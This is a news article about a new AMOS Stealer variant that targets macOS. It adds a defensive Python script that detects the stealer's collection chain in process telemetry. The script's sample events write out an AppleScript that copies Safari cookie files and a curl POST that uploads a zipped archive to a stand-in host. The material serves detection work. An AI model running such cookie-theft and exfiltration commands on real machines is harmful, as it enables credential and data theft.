Hard to beat, easy to get infected: Why the new AMOS Stealer strain isn't just another virus

Teacher

The malware strips systems of their data while laughing in the face of antivirus programs.

Bitdefender specialists have discovered a new version of the AMOS Stealer (also known as Atomic Stealer), one of the most widespread threats to macOS users over the past year. According to Bitdefender, the new variant was identified while studying old and new macOS malware samples in order to improve detection of such threats.

Suspicion was raised by several small (1.3 MB) macOS disk images. Detailed analysis showed that the new version resembles RustDoor. Both variants are designed to collect confidential files from infected computers, and the current one is a more advanced version of the RustDoor script.

The new version has additional features. It collects Safari's Cookies.binarycookies file, gathers files with specific extensions from specific locations, and uses the system_profiler utility to obtain system information.

In this way, the attackers learn the computer's hardware characteristics, OS version, connected monitors and video cards. Passwords, encryption keys, and certificates are added to the archive, which points to a growing interest in crypto platforms.

In this version, Python and AppleScript are combined in an unusual way: the grabber() function executes a large AppleScript block via the osascript -e command. The DMG files contain executable modules for both Intel and ARM that are used for data theft.

When opened, the Crack Installer app prompts the user to unzip the file. The Python script then collects confidential data from various sources, including crypto wallets, browsers, and accounts.

The collected data is saved in a ZIP archive and sent to the C2 server via an HTTP POST request. The server confirms the structure of the archive.
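The collection chain described above (a Python process spawning osascript -e with a large inline AppleScript block, system_profiler for host fingerprinting, access to Cookies.binarycookies, ZIP staging and an HTTP POST to the C2) is exactly the kind of behaviour a defender can hunt for in process-execution telemetry, independently of file hashes. The script below is an added example written for this page, not Bitdefender's detection logic or their published IoCs: it scores each process tree in a set of exec events by how many of those behavioural indicators its descendants exhibit. The event lines, the paths, the AppleScript text and the 198.51.100.7 address are constructed for the demonstration; the event shape is an assumption loosely modelled on EDR or eslogger exports and would need adapting to a real feed.

```python
"""Hunt for an AMOS-style collection chain in macOS process-exec telemetry.

Added example for this page; the heuristics are the editor's own and are
not Bitdefender's IoCs. Event format (one JSON object per line with ts, pid,
ppid, exe, argv) is an assumption, not a real product's schema.
"""
import json
import re
from collections import defaultdict

PYTHON_RE = re.compile(r"/python(3(\.\d+)?)?$")
INLINE_SCRIPT_MIN = 200  # chars passed to `osascript -e`; AMOS passes a large block
POST_FLAGS = {"-F", "-d", "--data", "--data-binary", "--data-raw"}

# Constructed sample telemetry (NOT real captures). Tree 501 mimics the chain
# described in the article; tree 600 is a benign admin session used as a control.
SAMPLE_EVENTS = r'''
{"ts": 1, "pid": 501, "ppid": 1, "exe": "/Volumes/Installer/Crack Installer.app/Contents/MacOS/Crack Installer", "argv": ["Crack Installer"]}
{"ts": 2, "pid": 502, "ppid": 501, "exe": "/usr/bin/python3", "argv": ["python3", "/private/tmp/grabber"]}
{"ts": 3, "pid": 503, "ppid": 502, "exe": "/usr/bin/osascript", "argv": ["osascript", "-e", "set home to (path to home folder as text)\nset tmp to home & \"tmp:\"\nrepeat with f in {\"Cookies.binarycookies\", \"Login Data\", \"Cookies\"}\ntry\ndo shell script \"cp -R \" & quoted form of f & \" \" & quoted form of tmp\nend try\nend repeat\ndo shell script \"system_profiler SPHardwareDataType SPDisplaysDataType > \" & quoted form of tmp & \"sys.txt\"\ndo shell script \"zip -r ~/tmp/out.zip ~/tmp\""]}
{"ts": 4, "pid": 504, "ppid": 503, "exe": "/bin/sh", "argv": ["sh", "-c", "cp -R /Users/u/Library/Cookies/Cookies.binarycookies /Users/u/tmp/"]}
{"ts": 5, "pid": 505, "ppid": 503, "exe": "/usr/sbin/system_profiler", "argv": ["system_profiler", "SPHardwareDataType", "SPDisplaysDataType"]}
{"ts": 6, "pid": 506, "ppid": 503, "exe": "/usr/bin/zip", "argv": ["zip", "-r", "/Users/u/tmp/out.zip", "/Users/u/tmp"]}
{"ts": 7, "pid": 507, "ppid": 502, "exe": "/usr/bin/curl", "argv": ["curl", "-X", "POST", "-F", "file=@/Users/u/tmp/out.zip", "http://198.51.100.7/upload"]}
{"ts": 8, "pid": 600, "ppid": 1, "exe": "/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal", "argv": ["Terminal"]}
{"ts": 9, "pid": 601, "ppid": 600, "exe": "/usr/sbin/system_profiler", "argv": ["system_profiler", "SPDisplaysDataType"]}
{"ts": 10, "pid": 602, "ppid": 600, "exe": "/usr/bin/curl", "argv": ["curl", "-X", "POST", "-d", "{}", "https://api.example.com/ping"]}
'''


def parse_events(text):
    """Parse newline-delimited JSON exec events, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def build_tree(events):
    """Return (pid -> event, ppid -> [child pids])."""
    by_pid = {e["pid"]: e for e in events}
    children = defaultdict(list)
    for e in events:
        children[e["ppid"]].append(e["pid"])
    return by_pid, children


def descendants(pid, children):
    """All pids in the subtree rooted at pid, including pid itself."""
    stack, seen = [pid], []
    while stack:
        p = stack.pop()
        seen.append(p)
        stack.extend(children.get(p, []))
    return seen


def indicators(event, by_pid):
    """Set of AMOS-chain indicators matched by one exec event."""
    argv = event.get("argv", [])
    joined = " ".join(argv)
    exe = event["exe"]
    parent = by_pid.get(event["ppid"])
    found = set()
    # A Python interpreter handing a large inline AppleScript block to osascript.
    if exe.endswith("/osascript") and "-e" in argv:
        i = argv.index("-e")
        script = argv[i + 1] if i + 1 < len(argv) else ""
        if len(script) >= INLINE_SCRIPT_MIN and parent and PYTHON_RE.search(parent["exe"]):
            found.add("python_spawns_large_osascript")
    if exe.endswith("/system_profiler"):
        found.add("system_profiler")
    if "Cookies.binarycookies" in joined:
        found.add("safari_cookies_access")
    if exe.endswith(("/zip", "/ditto")) and ".zip" in joined:
        found.add("zip_staging")
    if exe.endswith("/curl"):
        explicit_post = "-X" in argv and argv.index("-X") + 1 < len(argv) \
            and argv[argv.index("-X") + 1].upper() == "POST"
        if explicit_post or POST_FLAGS.intersection(argv):
            found.add("http_post_exfil")
    return found


def hunt(events, min_indicators=3):
    """Report root processes whose subtree shows >= min_indicators distinct indicators.

    Scoring the whole tree rather than single events is what separates the
    stealer from a lone `system_profiler` or `curl` run by an administrator.
    """
    by_pid, children = build_tree(events)
    roots = [p for p, e in by_pid.items() if e["ppid"] not in by_pid]
    findings = []
    for root in roots:
        hits = set()
        for pid in descendants(root, children):
            hits |= indicators(by_pid[pid], by_pid)
        if len(hits) >= min_indicators:
            findings.append({"root_pid": root, "root_exe": by_pid[root]["exe"],
                             "indicators": sorted(hits)})
    return findings


if __name__ == "__main__":
    for f in hunt(parse_events(SAMPLE_EVENTS)):
        print(f"pid {f['root_pid']} {f['root_exe']}: {', '.join(f['indicators'])}")
```

With the default threshold only the Crack Installer tree is reported, carrying all five indicators; the Terminal session, which legitimately runs system_profiler and a curl POST, stays below it. Lowering min_indicators to 2 surfaces that benign tree as well, which is the usual trade-off when tuning this kind of behavioural rule against real endpoint noise.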

At the moment, the new variant is barely detected by antivirus programs. Bitdefender has published indicators of compromise (IoCs) to identify and neutralize this threat.